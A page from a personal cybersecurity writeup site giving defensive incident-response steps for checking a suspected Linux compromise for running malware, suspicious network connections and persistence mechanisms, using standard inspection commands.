KARIM ASHRAF SPACE.
  • Who Am I ?
  • WRITEUPS
    • What about Practice in Cyber Security?
    • Dark Side of VSCode
    • What about Cy-nix Machine?
    • Cyberdefenders Labs
      • Web Investigation Blue Team Lab
      • Red Stealer Blue Team Lab
      • WebStrike Blue Team Lab
      • BlueSky Ransomware Blue Team Lab
      • PsExec Hunt Blue Team Lab
      • OpenWire Blue Team Lab
      • 3CX Supply Chain Blue Team Lab
      • PoisonedCredentials Lab
      • Reveal Lab
    • Lets Defend
      • Incident Responder Path
        • Cybersecurity Incident Handling Guide
          • Introduction to Incident Handling
          • Incident Handling Steps
          • Preparation
          • Detection and Analysis
          • Containment, Eradication, and Recovery
          • Post-Incident Activity
        • Incident Response on Windows
          • How to Create Incident Response Plan?
          • Incident Response Procedure
          • 3 Important Things
          • Free Tools That Can Be Used
          • Live Memory Analysis
          • Task Scheduler
          • Services
          • Registry Run Keys / Startup Folder
          • Files
          • Checklist
        • Incident Response on Linux
          • How to Create Incident Response Plan?
          • Incident Response Procedure
          • 3 Important Things
          • Users and Groups
          • Processes
          • Files and File System
          • Mounts
          • Network
          • Service
          • Cron Job
          • SSH Authorized Keys
          • Bash_rc & Bash_profile
          • Useful Log Files
        • Hacked Web Server Analysis
          • Introduction to Hacked Web Server Analysis
          • Log Analysis on Web Servers
          • Attacks on Web Servers
          • Attacks Against Web Applications
          • Vulnerabilities on Servers
          • Vulnerabilities in Programming Language
          • Discovering the Web Shell
          • Hacked Web Server Analysis Example
        • Log Analysis with Sysmon
          • Introduction and Set Up of Sysmon
          • Detecting Mimikatz with Sysmon
          • Detecting Pass The Hash with Sysmon
          • Detecting Privilege Escalation with Sysmon
        • Forensic Acquisition and Triage
          • Introduction to Forensics Acquisition and Triage
          • Acquiring Memory Image From Windows and Linux
          • Custom Image Using FTK and Mounting Image for Analysis
          • KAPE Targets for Acquisition
          • KAPE Modules for Triage and Analysis
          • Triage Using FireEye Redline
          • Acquisition and Triage of Disks Using Autopsy
        • Memory Forensics
          • What is Memory Forensics
          • Memory Analysis Procedures
        • Registry Forensics
          • Introduction to Windows Registry Forensics
          • Acquiring Registry Hives
          • Regedit and Registry Explorer
          • System, Users and Network Information
          • Shellbags
          • Shimcache
          • Amcache
          • Recent Files
          • Dialogue Boxes MRU
        • Event Log Analysis
          • Introduction to Event Logs
          • Event Log Analysis
          • Authentication Event Logs
          • Windows Scheduled Tasks Event Logs
          • Windows Services Event Logs
          • Account Management Events
          • Event Log Manipulation
          • Windows Firewall Event Logs
          • Windows Defender Event Logs
          • Powershell Command Execution Event logs
        • Browser Forensics
          • Introduction to Browser Forensics
          • Acquisition
          • Browser Artifacts
          • Tool: BrowsingHistoryView
          • Manual Browser Analysis
          • Hindsight Framework
        • GTFOBins
          • Introduction to GTFOBins
          • Shell
          • Command
          • Reverse Shell
          • Bind Shell
          • File Upload
          • File Download
          • Sudo
        • Hunting AD Attacks
          • Introduction to Active Directory
          • Hunting AS-REP Roasting Attack
          • Hunting for Kerberoasting Attacks
          • Hunting for LDAP Enumerations (Bloodhound_Sharphound)
          • Hunting for NTDS Database Dumping
          • Hunting for Golden Ticket Attacks
          • Hunting for NTLM Relay Attacks
        • Writing a Report on Security Incident
          • Introduction to Technical Writing
          • Reporting Standards
          • Reporting Style
          • Report Formatting
          • Report Templates
        • How to Prepare a Cyber Crisis Management Pla
          • Introduction to Crisis Management
          • General Preparation
          • Tools
          • Backups
          • Alerts and End of Crisis
        • Advanced Event Log Analysis
          • Process Creation
          • DNS Activity
          • File/Folder Monitoring
          • BITS Client Event Log
          • Network Connections Event Log
          • MSI Event Logs
        • USB Forensics
          • Introduction to USB Forensics
          • USB Registry Key
          • USB Event Logs
          • Folder Access Analysis via Shellbags
          • File Access Analysis via Jumplists
          • Automated USB Parsers Tools
        • Windows Disk Forensics
          • SRUM Database
          • Jumplists
          • Recycle Bin Artifacts
          • RDP Cache
          • Thumbnail Cache
    • BTLO LABS
      • Bruteforce BTLO
    • The Complete Active Directory Security Handbook
      • Introduction
      • Active Directory
      • Attack Technique 1: Pass the Hash: Use of Alternate Authentication Material (T1550)
      • Attack Technique 2: Pass the Ticket: Use of Alternate Authentication Material (T1550)
      • Attack Technique 3: Kerberoasting
      • Attack Technique 4: Golden Ticket Attack
      • Attack Technique 5: DCShadow Attack
      • Attack Technique 6: AS-REP Roasting
      • Attack Technique 7: LDAP Injection Attack
      • Attack Technique 8: PetitPotam NTLM Relay Attack on a Active Directory Certificate Services (AD CS)
      • Conclusion & References
    • Windows Privilege Escalation
      • Tools
      • Windows Version and Configuration
      • User Enumeration
      • Network Enumeration
      • Antivirus Enumeration
      • Default Writeable Folders
      • EoP - Looting for passwords
      • EoP - Incorrect permissions in services
      • EoP - Windows Subsystem for Linux (WSL)
      • EoP - Unquoted Service Paths
      • EoP - $PATH Interception
      • EoP - Named Pipes
      • EoP - Kernel Exploitation
      • EoP - AlwaysInstallElevated
      • EoP - Insecure GUI apps
      • EoP - Evaluating Vulnerable Drivers
      • EoP - Printers
      • EoP - Runas
      • EoP - Abusing Shadow Copies
      • EoP - From local administrator to NT SYSTEM
      • EoP - Living Off The Land Binaries and Scripts
      • EoP - Impersonation Privileges
      • EoP - Privileged File Write
      • References
      • Practical Labs
    • Advanced Log Analysis
      • Key Windows Event IDs for Cybersecurity Monitoring
      • Analyzing a Series of Failed Login Attempts from Multiple IP Addresses
      • Steps to Investigate Suspicious Outbound Network Traffic
      • Identifying and Responding to Lateral Movement within a Network
      • Distinguishing Between Legitimate and Malicious PowerShell Executions
      • Detecting and Analyzing a Potential Data Exfiltration Incident Using Log Data
      • Steps to Analyze PowerShell Logging (Event ID 4104) for Malicious Activity
      • How to Identify an Internal Pivot Attack Using Log Data
      • Indicators in Logs Suggesting a Privilege Escalation Attack
      • How to Detect Command and Control (C2) Communication Using Log Analysis
      • How to Analyze Logs to Detect a Brute-Force Attack on an RDP Service
      • How to Analyze Logs to Detect a Brute-Force Attack on an RDP Service
      • How to Detect the Use of Living-Off-the-Land Binaries (LOLBins) in Logs
      • How to Detect Malware Masquerading as a Legitimate Process Using Log Analysis
      • How to Detect and Analyze Lateral Movement Using Windows Event Logs
      • How to Detect Potential Ransomware Attacks in Their Early Stages Using Log Analysis
      • How to Detect and Analyze Privilege Escalation Using Windows Event Logs
      • How to Detect the Use of Mimikatz or Similar Tools in Log Data
      • How to Detect and Analyze DNS Tunneling Through Log Analysis
      • How to Detect a Pass-the-Hash (PtH) Attack Using Logs
      • How to Detect and Analyze an Attacker’s Use of a Remote Access Trojan (RAT) Using Log Data
      • How to Detect Lateral Movement Using Windows Event Logs
      • How to Detect and Investigate Data Exfiltration Using Logs
      • How to Identify and Analyze an Internal Phishing Campaign Using Email and System Logs
      • How to Detect and Analyze Ransomware Activity Using Logs
      • How to Detect Malicious PowerShell Activity Using Log Analysis
      • How to Detect and Respond to Brute-Force Attacks Using Log Data
      • How to Detect Privilege Escalation Attempts Using Windows Event Logs
      • How to Detect and Analyze Suspicious Domain Name Resolution Requests in DNS Logs
      • How to Detect and Respond to Unauthorized Access to Critical Files
      • How to Detect and Analyze Suspicious PowerShell Command Execution
      • How to Detect and Investigate Account Takeover (ATO) Attempts Using
      • How to Detect and Analyze the Use of Living Off the Land Binaries (LOLBins)
      • How to Detect and Investigate Lateral Movement
      • How to Detect and Investigate Data Exfiltration
      • How to Detect and Analyze Suspicious Activity Involving Service Accounts
      • How to Detect and Investigate Anomalous PowerShell Activity Related to Credential Dumping
      • How to Detect and Analyze the Execution of Unsigned or Malicious Executables
      • How to Detect and Investigate Abnormal Spikes in Network Traffic
    • Methods for Stealing Password in Browser
      • Important Tables and Columns
      • Important Queries
      • Profiles
      • Tools
        • HackBrowserData
        • Browser-password-stealer
        • BrowserPass
        • WebBrowserPassView
        • Infornito
        • Hindsight
        • BrowserFreak
        • BrowserStealer
  • The Ultimate Active Directory CheatSheet
  • COURSES SUMMARY
    • TCM SEC
      • TCM linux Privilege Escalation
      • TCM OSINT
    • The SecOps Group
      • Certified AppSec Practitioner exam
      • CNSP Review
    • Cybrary
      • Cybrary Offensive Pentesting
  • TIPS&TRICKS
    • Windows Shorcuts Arrow Remover
    • Kali KEX
    • Intel TurboBoost
    • Pentest_Copilot
    • Ferdium
    • Youtube Adblock_Bybass
    • Burb-Bambdas
    • Burb Customizer
    • BetterFox
Powered by GitBook
On this page
  • Investigating a Suspected Compromise on a Linux System
  • 1. Is There Malware Actively Running in the System?
  • 2. Is There Any Suspicious Internal or External Communication?
  • 3. Is There Any Persistence?
  • Findings and Next Steps:
  • Next Steps:
  1. WRITEUPS
  2. Lets Defend
  3. Incident Responder Path
  4. Incident Response on Linux

3 Important Things

Investigating a Suspected Compromise on a Linux System

When responding to a suspected compromise on a Linux system, answering the following key questions systematically helps uncover malicious activities and guide further investigation.

1. Is There Malware Actively Running in the System?

Objective: Detect and analyze potentially malicious processes running on the system.

Steps to Identify Malicious Processes:

  1. List Active Processes:

    • Use ps or top to review running processes.

      ps aux | less

      Look for:

      • Processes with unusual names (e.g., xmr, random123).

      • Commands running from temporary or suspicious directories like /tmp, /dev/shm.

      • High CPU or memory usage by unexpected processes.

  2. Analyze the Process Tree:

    • Use pstree for a hierarchical view of processes.

      pstree -p

      Focus on:

      • Unexpected parent-child relationships (e.g., apache2 spawning bash).

  3. Investigate Executable Files:

    • Use lsof to list files opened by a specific process.

      lsof -p <PID>

      Check for:

      • Executables running from non-standard directories.

      • Open network sockets or files.

  4. Review Hidden Processes:

    • Hidden processes might evade standard tools. Cross-verify using:

      ps -elf | grep <process-name>

2. Is There Any Suspicious Internal or External Communication?

Objective: Detect unusual or unauthorized network activity indicative of C2 communication or data exfiltration.

Steps to Investigate Network Activity:

  1. Check Active Network Connections:

    • Use ss or netstat to list open connections and listening services.

      ss -tuln

      Look for:

      • Connections to unknown external IPs.

      • Unusual listening ports (e.g., port 4444 used for reverse shells).

  2. Monitor Network Traffic:

    • Capture live traffic with tcpdump.

      tcpdump -i eth0

      Filter for suspicious activity:

      • DNS queries (port 53) for domains resembling C2 communication.

        tcpdump -i eth0 port 53

      • Large outbound transfers:

        tcpdump -i eth0 'tcp[13] & 16 != 0'

  3. Analyze Historical Network Activity:

    • Check system logs for past network connections.

      grep "connect" /var/log/syslog

      • Look for unknown IP addresses or repeated failed connection attempts.

  4. Inspect DNS Queries:

    • Review DNS query logs (if available) to identify suspicious domain resolutions.

3. Is There Any Persistence?

Objective: Detect mechanisms attackers use to maintain long-term access.

Steps to Identify Persistence Mechanisms:

  1. Check for Malicious Cron Jobs:

    • List current user's scheduled tasks.

      crontab -l

    • System-wide cron jobs:

      cat /etc/crontab
ls -la /etc/cron.*

      Indicators:

      • Unknown scripts or commands scheduled to run periodically.

      • Scripts running from temporary locations.

  2. Inspect Startup Scripts:

    • Check for suspicious scripts or services configured to start on boot:

      ls -la /etc/init.d/
ls -la /etc/systemd/system/

    • Review /etc/rc.local for manually added startup commands.

  3. Examine SSH Keys:

    • Verify authorized keys in ~/.ssh/authorized_keys.

      cat ~/.ssh/authorized_keys

      Look for:

      • Unauthorized public keys potentially used for backdoor access.

  4. Search for Recently Modified Files:

    • Identify files changed in the last few days.

      find / -type f -mtime -5 2>/dev/null

      Check:

      • Key system files like .bashrc, .profile, and system binaries for unauthorized modifications.

Findings and Next Steps:

By following the outlined steps, you can determine:

  • Active Malware Presence: Identified through anomalous processes and suspicious executable files.

  • Suspicious Network Activity: Revealed by unusual external connections, DNS queries, and active network traffic.

  • Persistence Mechanisms: Found through malicious cron jobs, startup scripts, or unauthorized SSH keys.

Next Steps:

  1. Isolate the affected system to prevent further spread.

  2. Collect Evidence: Save logs, memory dumps, and identified malware samples.

  3. Remediate: Remove malicious processes, clean persistence mechanisms, and patch vulnerabilities.

  4. Monitor: Continuously monitor for signs of re-infection or additional compromises.

PreviousIncident Response ProcedureNextUsers and Groups

Last updated 7 months ago